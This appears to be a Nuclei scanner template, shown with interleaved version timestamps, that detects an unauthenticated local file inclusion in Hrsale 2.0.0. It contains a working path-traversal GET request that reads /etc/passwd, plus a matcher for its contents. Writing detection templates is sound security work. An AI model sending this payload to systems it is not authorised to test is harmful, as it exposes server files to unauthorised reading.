2021-11-13 03:29:02 +00:00
id : hrsale-unauthenticated-lfi
2022-04-22 10:38:41 +00:00
2021-11-13 03:29:02 +00:00
info :
2022-08-05 13:57:51 +00:00
name : Hrsale 2.0.0 - Local File Inclusion
2021-11-13 03:29:02 +00:00
author : 0x_Akoko
severity : high
2022-08-05 13:57:51 +00:00
description : Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/48920
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : hrsale,lfi,edb
2021-11-13 03:29:02 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/03